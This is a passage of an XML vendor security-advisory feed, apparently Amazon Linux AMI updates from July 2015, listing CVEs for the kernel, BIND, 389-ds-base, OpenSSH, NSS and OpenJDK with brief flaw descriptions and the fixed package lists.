CVE-2015-5366 CVE-2015-5364 kernel: net: incorrect processing of checksums in UDP implementation
CVE-2015-5364:
A flaw was found in the way the Linux kernel's networking implementation handled UDP packets with incorrect checksum values. A remote attacker could potentially use this flaw to trigger an infinite loop in the kernel, resulting in a denial of service on the system, or cause a denial of service in applications using the edge triggered epoll functionality.
1239029:
CVE-2015-5366 CVE-2015-5364 kernel: net: incorrect processing of checksums in UDP implementation
CVE-2015-3212:
1226442:
CVE-2015-3212 kernel: SCTP race condition allows list corruption and panic from userlevel
CVE-2015-1805:
It was found that the Linux kernel's implementation of vectored pipe read and write functionality did not take into account the I/O vectors that were already processed when retrying after a failed atomic access operation, potentially resulting in memory corruption due to an I/O vector array overrun. A local, unprivileged user could use this flaw to crash the system or, potentially, escalate their privileges on the system.
1202855:
CVE-2015-1805 kernel: pipe: iovec overrun leading to memory corruption
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1805" title="" id="CVE-2015-1805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3212" title="" id="CVE-2015-3212" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5364" title="" id="CVE-2015-5364" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5366" title="" id="CVE-2015-5366" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.48-33.39.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.48" release="33.39.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.48-33.39.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="3.14.48" release="33.39.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.48-33.39.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-566</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-566: important priority package update for bind</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4620:
A flaw was found in the way BIND performed DNSSEC validation. An attacker able to make BIND (functioning as a DNS resolver with DNSSEC validation enabled) resolve a name in an attacker-controlled domain could cause named to exit unexpectedly with an assertion failure.
1237258:
CVE-2015-4620 bind: abort DoS caused by uninitialized value use in isselfsigned()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4620" title="" id="CVE-2015-4620" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-devel" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.30.rc1.37.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.30.rc1.37.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.30.rc1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-567</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-567: medium priority package update for 389-ds-base</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3230:
1232096:
CVE-2015-3230 389-ds-base: nsSSL3Ciphers preference not enforced server side (regression)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3230" title="" id="CVE-2015-3230" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="389-ds-base-devel" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-devel-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="x86_64"><filename>Packages/389-ds-base-libs-1.3.3.1-16.42.amzn1.x86_64.rpm</filename></package><package name="389-ds-base" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-1.3.3.1-16.42.amzn1.i686.rpm</filename></package><package name="389-ds-base-libs" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-libs-1.3.3.1-16.42.amzn1.i686.rpm</filename></package><package name="389-ds-base-debuginfo" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-debuginfo-1.3.3.1-16.42.amzn1.i686.rpm</filename></package><package name="389-ds-base-devel" version="1.3.3.1" release="16.42.amzn1" epoch="0" arch="i686"><filename>Packages/389-ds-base-devel-1.3.3.1-16.42.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-568</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-568: medium priority package update for openssh</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5352:
1238231:
CVE-2015-5352 openssh: XSECURITY restrictions bypass under certain conditions in ssh(1)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5352" title="" id="CVE-2015-5352" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.2p2-8.44.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-clients" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="5.8.44.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-5.8.44.amzn1.i686.rpm</filename></package><package name="openssh" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.2p2-8.44.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.2p2" release="8.44.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.2p2-8.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-569</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-569: medium priority package update for nss nss-util</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4000:
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic.
1223211:
CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1185.html" title="" id="RHSA-2015:1185" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-util-debuginfo" version="3.19.1" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-debuginfo-3.19.1-1.41.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-3.19.1-1.41.amzn1.x86_64.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="1.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-util-devel-3.19.1-1.41.amzn1.x86_64.rpm</filename></package><package name="nss-util" version="3.19.1" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-3.19.1-1.41.amzn1.i686.rpm</filename></package><package name="nss-util-devel" version="3.19.1" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-devel-3.19.1-1.41.amzn1.i686.rpm</filename></package><package name="nss-util-debuginfo" version="3.19.1" release="1.41.amzn1" epoch="0" arch="i686"><filename>Packages/nss-util-debuginfo-3.19.1-1.41.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-pkcs11-devel-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-tools" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-tools-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-devel-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-sysinit-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="3.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-debuginfo-3.19.1-3.71.amzn1.x86_64.rpm</filename></package><package name="nss-sysinit" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-tools" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-tools-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.19.1-3.71.amzn1.i686.rpm</filename></package><package name="nss-debuginfo" version="3.19.1" release="3.71.amzn1" epoch="0" arch="i686"><filename>Packages/nss-debuginfo-3.19.1-3.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-570</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-570: critical priority package update for java-1.7.0-openjdk</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4760:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4749:
It was discovered that the JNDI component in OpenJDK did not handle DNS resolutions correctly. An attacker able to trigger such DNS errors could cause a Java application using JNDI to consume memory and CPU time, and possibly block further DNS resolution.
CVE-2015-4748:
A flaw was found in the way the Libraries component of OpenJDK verified Online Certificate Status Protocol (OCSP) responses. An OCSP response with no nextUpdate date specified was incorrectly handled as having unlimited validity, possibly causing a revoked X.509 certificate to be interpreted as valid.
CVE-2015-4733:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4732:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4731:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4000:
A flaw was found in the way the TLS protocol composed the Diffie-Hellman (DH) key exchange. A man-in-the-middle attacker could use this flaw to force the use of weak 512 bit export-grade keys during the key exchange, allowing them do decrypt all traffic.
CVE-2015-2808:
A flaw was found in the RC4 encryption algorithm. When using certain keys for RC4 encryption, an attacker could obtain portions of the plain text from the cipher text without the knowledge of the encryption key.
CVE-2015-2632:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2628:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-2625:
A flaw was found in the way the JSSE component in OpenJDK performed X.509 certificate identity verification when establishing a TLS/SSL connection to a host identified by an IP address. In certain cases, the certificate was accepted as valid if it was issued for a host name to which the IP address resolves rather than for the IP address.
CVE-2015-2621:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2601:
It was discovered that the JCE component in OpenJDK failed to use constant time comparisons in multiple cases. An attacker could possibly use these flaws to disclose sensitive information by measuring the time used to perform operations using these non-constant time comparisons.
CVE-2015-2590:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2590" title="" id="CVE-2015-2590" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2601" title="" id="CVE-2015-2601" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2621" title="" id="CVE-2015-2621" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2625" title="" id="CVE-2015-2625" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2628" title="" id="CVE-2015-2628" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2632" title="" id="CVE-2015-2632" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2808" title="" id="CVE-2015-2808" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4731" title="" id="CVE-2015-4731" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4732" title="" id="CVE-2015-4732" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4733" title="" id="CVE-2015-4733" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4748" title="" id="CVE-2015-4748" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4749" title="" id="CVE-2015-4749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4760" title="" id="CVE-2015-4760" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2015:1229.html" title="" id="RHSA-2015:1229" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk-demo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.61.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.61.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.85" release="2.6.1.3.61.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-571</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-571: important priority package update for java-1.8.0-openjdk</title><issued date="2015-07-22 10:00:00" /><updated date="2015-07-22 10:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4760:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4749:
It was discovered that the JNDI component in OpenJDK did not handle DNS resolutions correctly. An attacker able to trigger such DNS errors could cause a Java application using JNDI to consume memory and CPU time, and possibly block further DNS resolution.
CVE-2015-4748:
A flaw was found in the way the Libraries component of OpenJDK verified Online Certificate Status Protocol (OCSP) responses. An OCSP response with no nextUpdate date specified was incorrectly handled as having unlimited validity, possibly causing a revoked X.509 certificate to be interpreted as valid.
CVE-2015-4733:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4732:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4731:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-4000:
A flaw was found in the way the TLS protocol composed the Diffie-Hellman (DH) key exchange. A man-in-the-middle attacker could use this flaw to force the use of weak 512 bit export-grade keys during the key exchange, allowing them do decrypt all traffic.
CVE-2015-3149:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack. Note: This issue was originally fixed as CVE-2015-0383, but the fix was regressed in the RHSA-2015:0809 advisory.
CVE-2015-2808:
A flaw was found in the RC4 encryption algorithm. When using certain keys for RC4 encryption, an attacker could obtain portions of the plain text from the cipher text without the knowledge of the encryption key.
CVE-2015-2659:
It was discovered that the GCM (Galois Counter Mode) implementation in the Security component of OpenJDK failed to properly perform a null check. This could cause the Java Virtual Machine to crash when an application performed encryption using a block cipher in the GCM mode.
CVE-2015-2632:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2628:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-2625:
A flaw was found in the way the JSSE component in OpenJDK performed X.509 certificate identity verification when establishing a TLS/SSL connection to a host identified by an IP address. In certain cases, the certificate was accepted as valid if it was issued for a host name to which the IP address resolves rather than for the IP address.
CVE-2015-2621:
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
CVE-2015-2601:
It was discovered that the JCE component in OpenJDK failed to use constant time comparisons in multiple cases. An attacker could possibly use these flaws to disclose sensitive information by measuring the time used to perform operations using these non-constant time comparisons.
CVE-2015-2590:
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2015-0383:
Multiple insecure temporary file use issues were found in the way the Hotspot component in OpenJDK created performance statistics and error log files. A local attacker could possibly make a victim using OpenJDK overwrite arbitrary files using a symlink attack. Note: This issue was originally fixed as CVE-2015-0383, but the fix was regressed in the RHSA-2015:0809 advisory.
